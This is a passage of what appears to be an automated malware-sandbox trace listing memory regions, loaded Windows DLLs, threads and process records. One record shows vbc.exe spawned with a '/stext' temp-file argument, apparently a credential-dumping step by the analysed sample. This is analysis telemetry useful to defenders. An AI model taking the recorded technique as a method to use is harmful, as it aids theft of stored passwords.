mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 858 start_va = 0x7ffaf7190000 end_va = 0x7ffaf724dfff entry_point = 0x7ffaf7190000 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\System32\\oleaut32.dll" (normalized: "c:\\windows\\system32\\oleaut32.dll") Region: id = 859 start_va = 0x7ffaf72e0000 end_va = 0x7ffaf755bfff entry_point = 0x7ffaf72e0000 region_type = mapped_file name = "combase.dll" filename = "\\Windows\\System32\\combase.dll" (normalized: "c:\\windows\\system32\\combase.dll") Region: id = 860 start_va = 0x7ffaf7560000 end_va = 0x7ffaf75c8fff entry_point = 0x7ffaf7560000 region_type = mapped_file name = "ws2_32.dll" filename = "\\Windows\\System32\\ws2_32.dll" (normalized: "c:\\windows\\system32\\ws2_32.dll") Region: id = 861 start_va = 0x7ffaf75d0000 end_va = 0x7ffaf7675fff entry_point = 0x7ffaf75d0000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 862 start_va = 0x7ffaf7680000 end_va = 0x7ffaf7687fff entry_point = 0x7ffaf7680000 region_type = mapped_file name = "nsi.dll" filename = "\\Windows\\System32\\nsi.dll" (normalized: "c:\\windows\\system32\\nsi.dll") Region: id = 863 start_va = 0x7ffaf7690000 end_va = 0x7ffaf7854fff entry_point = 0x7ffaf7690000 region_type = mapped_file name = "setupapi.dll" filename = "\\Windows\\System32\\setupapi.dll" (normalized: "c:\\windows\\system32\\setupapi.dll") Region: id = 864 start_va = 0x7ffaf7860000 end_va = 0x7ffaf78b0fff entry_point = 0x7ffaf7860000 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\System32\\shlwapi.dll" (normalized: "c:\\windows\\system32\\shlwapi.dll") Region: id = 865 start_va = 0x7ffaf7a10000 end_va = 0x7ffaf7bd1fff entry_point = 0x7ffaf7a10000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 867 start_va = 0x7ffade430000 end_va = 0x7ffade6dffff entry_point = 0x7ffade430000 region_type = mapped_file name = "netshell.dll" filename = "\\Windows\\System32\\netshell.dll" (normalized: "c:\\windows\\system32\\netshell.dll") Thread: id = 12 os_tid = 0xd34 Thread: id = 13 os_tid = 0xd60 Thread: id = 14 os_tid = 0xd74 Thread: id = 15 os_tid = 0xd64 Thread: id = 16 os_tid = 0xd40 Thread: id = 17 os_tid = 0xcfc Thread: id = 18 os_tid = 0xcf8 Thread: id = 19 os_tid = 0xcf0 Thread: id = 20 os_tid = 0xcd4 Thread: id = 21 os_tid = 0xcd8 Thread: id = 22 os_tid = 0xcd0 Thread: id = 23 os_tid = 0xccc Thread: id = 24 os_tid = 0xcf4 Thread: id = 25 os_tid = 0x4e8 Thread: id = 26 os_tid = 0xff4 Thread: id = 27 os_tid = 0xe44 Thread: id = 28 os_tid = 0xe4c Thread: id = 29 os_tid = 0xe48 Thread: id = 30 os_tid = 0xe40 Thread: id = 31 os_tid = 0xe3c Thread: id = 32 os_tid = 0xe38 Thread: id = 33 os_tid = 0xdb0 Thread: id = 34 os_tid = 0xdac Thread: id = 35 os_tid = 0xc98 Thread: id = 36 os_tid = 0xc94 Thread: id = 37 os_tid = 0xc14 Thread: id = 38 os_tid = 0xc0c Thread: id = 39 os_tid = 0x6fc Thread: id = 40 os_tid = 0x738 Thread: id = 41 os_tid = 0x260 Thread: id = 42 os_tid = 0x8a0 Thread: id = 43 os_tid = 0x89c Thread: id = 44 os_tid = 0x844 Thread: id = 45 os_tid = 0x7f8 Thread: id = 46 os_tid = 0x7b8 Thread: id = 47 os_tid = 0x7b4 Thread: id = 48 os_tid = 0x79c Thread: id = 49 os_tid = 0x794 Thread: id = 50 os_tid = 0x774 Thread: id = 51 os_tid = 0x75c Thread: id = 52 os_tid = 0x754 Thread: id = 53 os_tid = 0x74c Thread: id = 54 os_tid = 0x740 Thread: id = 55 os_tid = 0x728 Thread: id = 56 os_tid = 0x720 Thread: id = 57 os_tid = 0x6e8 Thread: id = 58 os_tid = 0x6d0 Thread: id = 59 os_tid = 0x6a0 Thread: id = 60 os_tid = 0x668 Thread: id = 61 os_tid = 0x64c Thread: id = 62 os_tid = 0x648 Thread: id = 63 os_tid = 0x63c Thread: id = 64 os_tid = 0x638 Thread: id = 65 os_tid = 0x628 Thread: id = 66 os_tid = 0x620 Thread: id = 67 os_tid = 0x600 Thread: id = 68 os_tid = 0x5ec Thread: id = 69 os_tid = 0x5e8 Thread: id = 70 os_tid = 0x5dc Thread: id = 71 os_tid = 0x5d4 Thread: id = 72 os_tid = 0x5d0 Thread: id = 73 os_tid = 0x5cc Thread: id = 74 os_tid = 0x5b4 Thread: id = 75 os_tid = 0x5ac Thread: id = 76 os_tid = 0x5a8 Thread: id = 77 os_tid = 0x5a4 Thread: id = 78 os_tid = 0x5a0 Thread: id = 79 os_tid = 0x59c Thread: id = 80 os_tid = 0x55c Thread: id = 81 os_tid = 0x4f0 Thread: id = 82 os_tid = 0x4ec Thread: id = 83 os_tid = 0x130 Thread: id = 84 os_tid = 0x18c Thread: id = 85 os_tid = 0x168 Thread: id = 86 os_tid = 0x118 Thread: id = 87 os_tid = 0x11c Thread: id = 88 os_tid = 0xfc Thread: id = 89 os_tid = 0xf8 Thread: id = 90 os_tid = 0xf4 Thread: id = 91 os_tid = 0x3fc Thread: id = 92 os_tid = 0x3e8 Thread: id = 93 os_tid = 0x3c8 Thread: id = 94 os_tid = 0x3c4 Thread: id = 95 os_tid = 0x3c0 Thread: id = 96 os_tid = 0x3bc Thread: id = 97 os_tid = 0x3a0 Thread: id = 98 os_tid = 0x31c Thread: id = 99 os_tid = 0xd98 Thread: id = 101 os_tid = 0xd8c Thread: id = 102 os_tid = 0xd90 Thread: id = 118 os_tid = 0xe6c Thread: id = 119 os_tid = 0xe68 Thread: id = 129 os_tid = 0xebc Thread: id = 136 os_tid = 0xa2c Thread: id = 137 os_tid = 0x444 Thread: id = 167 os_tid = 0xb38 Thread: id = 169 os_tid = 0xf74 Thread: id = 170 os_tid = 0xf68 Thread: id = 171 os_tid = 0xb68 Thread: id = 172 os_tid = 0xf10 Thread: id = 195 os_tid = 0xfec Thread: id = 196 os_tid = 0xff0 Process: id = "3" image_name = "wmiprvse.exe" filename = "c:\\windows\\system32\\wbem\\wmiprvse.exe" page_root = "0x46e47000" os_pid = "0xda0" os_integrity_level = "0x4000" os_privileges = "0x60800000" monitor_reason = "rpc_server" parent_id = "2" os_parent_pid = "0x318" cmd_line = "C:\\Windows\\system32\\wbem\\wmiprvse.exe -secured -Embedding" cur_dir = "C:\\Windows\\system32\\" os_username = "NT AUTHORITY\\Network Service" os_groups = "Everyone" [0x7], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\SERVICE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "WMI (Network Service)" [0xf], "NT AUTHORITY\\Logon Session 00000000:0007c18d" [0xc000000f] Region: id = 868 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 869 start_va = 0x35007a0000 end_va = 0x35007bffff entry_point = 0x0 region_type = private name = "private_0x00000035007a0000" filename = "" Region: id = 870 start_va = 0x35007c0000 end_va = 0x35007d3fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000035007c0000" filename = "" Region: id = 871 start_va = 0x35007e0000 end_va = 0x350085ffff entry_point = 0x0 region_type = private name = "private_0x00000035007e0000" filename = "" Region: id = 872 start_va = 0x3500860000 end_va = 0x3500863fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000003500860000" filename = "" Region: id = 873 start_va = 0x3500870000 end_va = 0x3500870fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000003500870000" filename = "" Region: id = 874 start_va = 0x3500880000 end_va = 0x3500881fff entry_point = 0x0 region_type = private name = "private_0x0000003500880000" filename = "" Region: id = 875 start_va = 0x7df5ff530000 end_va = 0x7ff5ff52ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007df5ff530000" filename = "" Region: id = 876 start_va = 0x7ff702160000 end_va = 0x7ff702182fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007ff702160000" filename = "" Region: id = 877 start_va = 0x7ff702188000 end_va = 0x7ff702188fff entry_point = 0x0 region_type = private name = "private_0x00007ff702188000" filename = "" Region: id = 878 start_va = 0x7ff70218e000 end_va = 0x7ff70218ffff entry_point = 0x0 region_type = private name = "private_0x00007ff70218e000" filename = "" Region: id = 879 start_va = 0x7ff702dc0000 end_va = 0x7ff702e3efff entry_point = 0x7ff702dc0000 region_type = mapped_file name = "wmiprvse.exe" filename = "\\Windows\\System32\\wbem\\WmiPrvSE.exe" (normalized: "c:\\windows\\system32\\wbem\\wmiprvse.exe") Region: id = 880 start_va = 0x7ffaf7a10000 end_va = 0x7ffaf7bd1fff entry_point = 0x7ffaf7a10000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 881 start_va = 0x3500920000 end_va = 0x3500a1ffff entry_point = 0x0 region_type = private name = "private_0x0000003500920000" filename = "" Region: id = 882 start_va = 0x7ffaf4e50000 end_va = 0x7ffaf502cfff entry_point = 0x7ffaf4e50000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 883 start_va = 0x7ffaf70d0000 end_va = 0x7ffaf717cfff entry_point = 0x7ffaf70d0000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 884 start_va = 0x35007a0000 end_va = 0x35007affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000035007a0000" filename = "" Region: id = 885 start_va = 0x35007b0000 end_va = 0x35007b6fff entry_point = 0x0 region_type = private name = "private_0x00000035007b0000" filename = "" Region: id = 886 start_va = 0x3500890000 end_va = 0x350090ffff entry_point = 0x0 region_type = private name = "private_0x0000003500890000" filename = "" Region: id = 887 start_va = 0x3500a20000 end_va = 0x3500addfff entry_point = 0x3500a20000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 888 start_va = 0x3500c00000 end_va = 0x3500c0ffff entry_point = 0x0 region_type = private name = "private_0x0000003500c00000" filename = "" Region: id = 889 start_va = 0x7ff702060000 end_va = 0x7ff70215ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007ff702060000" filename = "" Region: id = 890 start_va = 0x7ff70218c000 end_va = 0x7ff70218dfff entry_point = 0x0 region_type = private name = "private_0x00007ff70218c000" filename = "" Region: id = 891 start_va = 0x7ffae92d0000 end_va = 0x7ffae92e5fff entry_point = 0x7ffae92d0000 region_type = mapped_file name = "ncobjapi.dll" filename = "\\Windows\\System32\\ncobjapi.dll" (normalized: "c:\\windows\\system32\\ncobjapi.dll") Region: id = 892 start_va = 0x7ffae9490000 end_va = 0x7ffae9587fff entry_point = 0x7ffae9490000 region_type = mapped_file name = "fastprox.dll" filename = "\\Windows\\System32\\wbem\\fastprox.dll" (normalized: "c:\\windows\\system32\\wbem\\fastprox.dll") Region: id = 893 start_va = 0x7ffaef560000 end_va = 0x7ffaef5defff entry_point = 0x7ffaef560000 region_type = mapped_file name = "wbemcomn.dll" filename = "\\Windows\\System32\\wbemcomn.dll" (normalized: "c:\\windows\\system32\\wbemcomn.dll") Region: id = 894 start_va = 0x7ffaf4260000 end_va = 0x7ffaf4287fff entry_point = 0x7ffaf4260000 region_type = mapped_file name = "bcrypt.dll" filename = "\\Windows\\System32\\bcrypt.dll" (normalized: "c:\\windows\\system32\\bcrypt.dll") Region: id = 895 start_va = 0x7ffaf5290000 end_va = 0x7ffaf53b5fff entry_point = 0x7ffaf5290000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 896 start_va = 0x7ffaf5700000 end_va = 0x7ffaf579cfff entry_point = 0x7ffaf5700000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 897 start_va = 0x7ffaf57a0000 end_va = 0x7ffaf57fafff entry_point = 0x7ffaf57a0000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 898 start_va = 0x7ffaf72e0000 end_va = 0x7ffaf755bfff entry_point = 0x7ffaf72e0000 region_type = mapped_file name = "combase.dll" filename = "\\Windows\\System32\\combase.dll" (normalized: "c:\\windows\\system32\\combase.dll") Region: id = 899 start_va = 0x7ffaf7560000 end_va = 0x7ffaf75c8fff entry_point = 0x7ffaf7560000 region_type = mapped_file name = "ws2_32.dll" filename = "\\Windows\\System32\\ws2_32.dll" (normalized: "c:\\windows\\system32\\ws2_32.dll") Region: id = 900 start_va = 0x7ffaf7680000 end_va = 0x7ffaf7687fff entry_point = 0x7ffaf7680000 region_type = mapped_file name = "nsi.dll" filename = "\\Windows\\System32\\nsi.dll" (normalized: "c:\\windows\\system32\\nsi.dll") Region: id = 901 start_va = 0x3500910000 end_va = 0x3500916fff entry_point = 0x0 region_type = private name = "private_0x0000003500910000" filename = "" Region: id = 902 start_va = 0x7ffaf75d0000 end_va = 0x7ffaf7675fff entry_point = 0x7ffaf75d0000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 903 start_va = 0x3500c10000 end_va = 0x3500f46fff entry_point = 0x3500c10000 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 904 start_va = 0x7ffaf5140000 end_va = 0x7ffaf528dfff entry_point = 0x7ffaf5140000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 905 start_va = 0x7ffaf5800000 end_va = 0x7ffaf5984fff entry_point = 0x7ffaf5800000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 906 start_va = 0x3500ae0000 end_va = 0x3500b9ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000003500ae0000" filename = "" Region: id = 907 start_va = 0x3500ba0000 end_va = 0x3500ba0fff entry_point = 0x0 region_type = private name = "private_0x0000003500ba0000" filename = "" Region: id = 908 start_va = 0x3500bb0000 end_va = 0x3500bb0fff entry_point = 0x0 region_type = private name = "private_0x0000003500bb0000" filename = "" Region: id = 909 start_va = 0x3500bc0000 end_va = 0x3500bc4fff entry_point = 0x3500bc0000 region_type = mapped_file name = "user32.dll.mui" filename = "\\Windows\\System32\\en-US\\user32.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\user32.dll.mui") Region: id = 910 start_va = 0x3500f50000 end_va = 0x35010d7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000003500f50000" filename = "" Region: id = 911 start_va = 0x35010e0000 end_va = 0x3501260fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000035010e0000" filename = "" Region: id = 912 start_va = 0x7ffaf44d0000 end_va = 0x7ffaf44defff entry_point = 0x7ffaf44d0000 region_type = mapped_file name = "kernel.appcore.dll" filename = "\\Windows\\System32\\kernel.appcore.dll" (normalized: "c:\\windows\\system32\\kernel.appcore.dll") Region: id = 913 start_va = 0x7ffaf4290000 end_va = 0x7ffaf42fafff entry_point = 0x7ffaf4290000 region_type = mapped_file name = "bcryptprimitives.dll" filename = "\\Windows\\System32\\bcryptprimitives.dll" (normalized: "c:\\windows\\system32\\bcryptprimitives.dll") Region: id = 914 start_va = 0x3500bd0000 end_va = 0x3500bd0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000003500bd0000" filename = "" Region: id = 915 start_va = 0x3500be0000 end_va = 0x3500be0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000003500be0000" filename = "" Region: id = 916 start_va = 0x3501270000 end_va = 0x35012effff entry_point = 0x0 region_type = private name = "private_0x0000003501270000" filename = "" Region: id = 917 start_va = 0x35012f0000 end_va = 0x35013effff entry_point = 0x0 region_type = private name = "private_0x00000035012f0000" filename = "" Region: id = 918 start_va = 0x7ff70218a000 end_va = 0x7ff70218bfff entry_point = 0x0 region_type = private name = "private_0x00007ff70218a000" filename = "" Region: id = 919 start_va = 0x7ffaf6ec0000 end_va = 0x7ffaf6f64fff entry_point = 0x7ffaf6ec0000 region_type = mapped_file name = "clbcatq.dll" filename = "\\Windows\\System32\\clbcatq.dll" (normalized: "c:\\windows\\system32\\clbcatq.dll") Region: id = 920 start_va = 0x3500bf0000 end_va = 0x3500bf0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000003500bf0000" filename = "" Region: id = 921 start_va = 0x7ffae9fa0000 end_va = 0x7ffae9fb0fff entry_point = 0x7ffae9fa0000 region_type = mapped_file name = "wbemprox.dll" filename = "\\Windows\\System32\\wbem\\wbemprox.dll" (normalized: "c:\\windows\\system32\\wbem\\wbemprox.dll") Region: id = 922 start_va = 0x7ffaf7190000 end_va = 0x7ffaf724dfff entry_point = 0x7ffaf7190000 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\System32\\oleaut32.dll" (normalized: "c:\\windows\\system32\\oleaut32.dll") Region: id = 923 start_va = 0x7ffaf3d00000 end_va = 0x7ffaf3d16fff entry_point = 0x7ffaf3d00000 region_type = mapped_file name = "cryptsp.dll" filename = "\\Windows\\System32\\cryptsp.dll" (normalized: "c:\\windows\\system32\\cryptsp.dll") Region: id = 924 start_va = 0x7ffaf3960000 end_va = 0x7ffaf3992fff entry_point = 0x7ffaf3960000 region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\System32\\rsaenh.dll" (normalized: "c:\\windows\\system32\\rsaenh.dll") Region: id = 925 start_va = 0x35013f0000 end_va = 0x350146ffff entry_point = 0x0 region_type = private name = "private_0x00000035013f0000" filename = "" Region: id = 926 start_va = 0x3501470000 end_va = 0x35014effff entry_point = 0x0 region_type = private name = "private_0x0000003501470000" filename = "" Region: id = 927 start_va = 0x35014f0000 end_va = 0x350156ffff entry_point = 0x0 region_type = private name = "private_0x00000035014f0000" filename = "" Region: id = 928 start_va = 0x3501570000 end_va = 0x35015effff entry_point = 0x0 region_type = private name = "private_0x0000003501570000" filename = "" Region: id = 929 start_va = 0x35015f0000 end_va = 0x350166ffff entry_point = 0x0 region_type = private name = "private_0x00000035015f0000" filename = "" Region: id = 930 start_va = 0x3501670000 end_va = 0x35016effff entry_point = 0x0 region_type = private name = "private_0x0000003501670000" filename = "" Region: id = 931 start_va = 0x7ff702058000 end_va = 0x7ff702059fff entry_point = 0x0 region_type = private name = "private_0x00007ff702058000" filename = "" Region: id = 932 start_va = 0x7ff70205a000 end_va = 0x7ff70205bfff entry_point = 0x0 region_type = private name = "private_0x00007ff70205a000" filename = "" Region: id = 933 start_va = 0x7ff70205c000 end_va = 0x7ff70205dfff entry_point = 0x0 region_type = private name = "private_0x00007ff70205c000" filename = "" Region: id = 934 start_va = 0x7ff70205e000 end_va = 0x7ff70205ffff entry_point = 0x0 region_type = private name = "private_0x00007ff70205e000" filename = "" Region: id = 935 start_va = 0x7ff702184000 end_va = 0x7ff702185fff entry_point = 0x0 region_type = private name = "private_0x00007ff702184000" filename = "" Region: id = 936 start_va = 0x7ff702186000 end_va = 0x7ff702187fff entry_point = 0x0 region_type = private name = "private_0x00007ff702186000" filename = "" Region: id = 937 start_va = 0x7ffae9440000 end_va = 0x7ffae9464fff entry_point = 0x7ffae9440000 region_type = mapped_file name = "wmiutils.dll" filename = "\\Windows\\System32\\wbem\\wmiutils.dll" (normalized: "c:\\windows\\system32\\wbem\\wmiutils.dll") Region: id = 938 start_va = 0x7ffae9470000 end_va = 0x7ffae9483fff entry_point = 0x7ffae9470000 region_type = mapped_file name = "wbemsvc.dll" filename = "\\Windows\\System32\\wbem\\wbemsvc.dll" (normalized: "c:\\windows\\system32\\wbem\\wbemsvc.dll") Region: id = 939 start_va = 0x7ffaf41e0000 end_va = 0x7ffaf41eafff entry_point = 0x7ffaf41e0000 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\System32\\cryptbase.dll" (normalized: "c:\\windows\\system32\\cryptbase.dll") Region: id = 940 start_va = 0x7ffade260000 end_va = 0x7ffade42dfff entry_point = 0x7ffade260000 region_type = mapped_file name = "cimwin32.dll" filename = "\\Windows\\System32\\wbem\\cimwin32.dll" (normalized: "c:\\windows\\system32\\wbem\\cimwin32.dll") Region: id = 941 start_va = 0x7ffade720000 end_va = 0x7ffade76dfff entry_point = 0x7ffade720000 region_type = mapped_file name = "framedynos.dll" filename = "\\Windows\\System32\\framedynos.dll" (normalized: "c:\\windows\\system32\\framedynos.dll") Region: id = 942 start_va = 0x7ffaf41b0000 end_va = 0x7ffaf41dbfff entry_point = 0x7ffaf41b0000 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\System32\\sspicli.dll" (normalized: "c:\\windows\\system32\\sspicli.dll") Region: id = 943 start_va = 0x7ffaf4440000 end_va = 0x7ffaf4489fff entry_point = 0x7ffaf4440000 region_type = mapped_file name = "powrprof.dll" filename = "\\Windows\\System32\\powrprof.dll" (normalized: "c:\\windows\\system32\\powrprof.dll") Region: id = 944 start_va = 0x35016f0000 end_va = 0x350176ffff entry_point = 0x0 region_type = private name = "private_0x00000035016f0000" filename = "" Region: id = 945 start_va = 0x3501770000 end_va = 0x3501772fff entry_point = 0x3501770000 region_type = mapped_file name = "wmi.dll" filename = "\\Windows\\System32\\wmi.dll" (normalized: "c:\\windows\\system32\\wmi.dll") Region: id = 946 start_va = 0x7ff702056000 end_va = 0x7ff702057fff entry_point = 0x0 region_type = private name = "private_0x00007ff702056000" filename = "" Region: id = 947 start_va = 0x7ffaf1420000 end_va = 0x7ffaf1430fff entry_point = 0x7ffaf1420000 region_type = mapped_file name = "wmiclnt.dll" filename = "\\Windows\\System32\\wmiclnt.dll" (normalized: "c:\\windows\\system32\\wmiclnt.dll") Region: id = 951 start_va = 0x3501780000 end_va = 0x35017fffff entry_point = 0x0 region_type = private name = "private_0x0000003501780000" filename = "" Region: id = 952 start_va = 0x3501800000 end_va = 0x3501802fff entry_point = 0x3501800000 region_type = mapped_file name = "cimwin32.dll.mui" filename = "\\Windows\\System32\\wbem\\en-US\\cimwin32.dll.mui" (normalized: "c:\\windows\\system32\\wbem\\en-us\\cimwin32.dll.mui") Region: id = 953 start_va = 0x3501810000 end_va = 0x3501812fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000003501810000" filename = "" Region: id = 954 start_va = 0x7ff702054000 end_va = 0x7ff702055fff entry_point = 0x0 region_type = private name = "private_0x00007ff702054000" filename = "" Region: id = 955 start_va = 0x7ffaf1940000 end_va = 0x7ffaf194afff entry_point = 0x7ffaf1940000 region_type = mapped_file name = "winnsi.dll" filename = "\\Windows\\System32\\winnsi.dll" (normalized: "c:\\windows\\system32\\winnsi.dll") Region: id = 956 start_va = 0x7ffaf1960000 end_va = 0x7ffaf1997fff entry_point = 0x7ffaf1960000 region_type = mapped_file name = "iphlpapi.dll" filename = "\\Windows\\System32\\IPHLPAPI.DLL" (normalized: "c:\\windows\\system32\\iphlpapi.dll") Region: id = 957 start_va = 0x7ffaf0810000 end_va = 0x7ffaf0825fff entry_point = 0x7ffaf0810000 region_type = mapped_file name = "dhcpcsvc6.dll" filename = "\\Windows\\System32\\dhcpcsvc6.dll" (normalized: "c:\\windows\\system32\\dhcpcsvc6.dll") Region: id = 958 start_va = 0x7ffaf07f0000 end_va = 0x7ffaf0809fff entry_point = 0x7ffaf07f0000 region_type = mapped_file name = "dhcpcsvc.dll" filename = "\\Windows\\System32\\dhcpcsvc.dll" (normalized: "c:\\windows\\system32\\dhcpcsvc.dll") Region: id = 959 start_va = 0x7ffaf3ab0000 end_va = 0x7ffaf3b57fff entry_point = 0x7ffaf3ab0000 region_type = mapped_file name = "dnsapi.dll" filename = "\\Windows\\System32\\dnsapi.dll" (normalized: "c:\\windows\\system32\\dnsapi.dll") Thread: id = 103 os_tid = 0xd88 Thread: id = 104 os_tid = 0xd80 Thread: id = 105 os_tid = 0xe78 Thread: id = 106 os_tid = 0x6ec Thread: id = 107 os_tid = 0xcbc Thread: id = 108 os_tid = 0xda4 Thread: id = 109 os_tid = 0xcdc Thread: id = 110 os_tid = 0xcb8 Thread: id = 111 os_tid = 0xc38 Thread: id = 112 os_tid = 0x724 Thread: id = 113 os_tid = 0xbe0 Thread: id = 168 os_tid = 0xf6c Process: id = "4" image_name = "vbc.exe" filename = "c:\\windows\\microsoft.net\\framework\\v2.0.50727\\vbc.exe" page_root = "0x292d2000" os_pid = "0xc54" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "1" os_parent_pid = "0xfcc" cmd_line = "\"C:\\Windows\\Microsoft.NET\\Framework\\v2.0.50727\\vbc.exe\" /stext \"C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Temp\\tmp3B59.tmp\"" cur_dir = "C:\\Users\\CIiHmnxMn6Ps\\Desktop\\" os_username = "LHNIWSJ\\CIiHmnxMn6Ps" os_groups = "LHNIWSJ\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:00013c81" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 968 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 969 start_va = 0x30000 end_va = 0x31fff entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 970 start_va = 0x40000 end_va = 0x53fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 971 start_va = 0x60000 end_va = 0x9ffff entry_point = 0x0 region_type = private name = "private_0x0000000000060000" filename = "" Region: id = 972 start_va = 0xa0000 end_va = 0x19ffff entry_point = 0x0 region_type = private name = "private_0x00000000000a0000" filename = "" Region: id = 973 start_va = 0x1a0000 end_va = 0x1a3fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001a0000" filename = "" Region: id = 974 start_va = 0x400000 end_va = 0x51efff entry_point = 0x400000 region_type = mapped_file name = "vbc.exe" filename = "\\Windows\\Microsoft.NET\\Framework\\v2.0.50727\\vbc.exe" (normalized: "c:\\windows\\microsoft.net\\framework\\v2.0.50727\\vbc.exe") Region: id = 975 start_va = 0x77990000 end_va = 0x77b08fff entry_point = 0x77990000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 976 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 977 start_va = 0x7ffdb000 end_va = 0x7ffddfff entry_point = 0x0 region_type = private name = "private_0x000000007ffdb000" filename = "" Region: id = 978 start_va = 0x7ffde000 end_va = 0x7ffdefff entry_point = 0x0 region_type = private name = "private_0x000000007ffde000" filename = "" Region: id = 979 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 980 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 981 start_va = 0x7fff0000 end_va = 0x7ffaf7a0ffff entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 982 start_va = 0x7ffaf7a10000 end_va = 0x7ffaf7bd1fff entry_point = 0x7ffaf7a10000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 983 start_va = 0x7ffaf7bd2000 end_va = 0x7ffffffeffff entry_point = 0x0 region_type = private name = "private_0x00007ffaf7bd2000" filename = "" Region: id = 984 start_va = 0x1b0000 end_va = 0x1b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 985 start_va = 0x1c0000 end_va = 0x1c1fff entry_point = 0x0 region_type = private name = "private_0x00000000001c0000" filename = "" Region: id = 986 start_va = 0x400000 end_va = 0x45afff entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 987 start_va = 0x360000 end_va = 0x36ffff entry_point = 0x0 region_type = private name = "private_0x0000000000360000" filename = "" Region: id = 988 start_va = 0x73040000 end_va = 0x7308efff entry_point = 0x73040000 region_type = mapped_file name = "wow64.dll" filename = 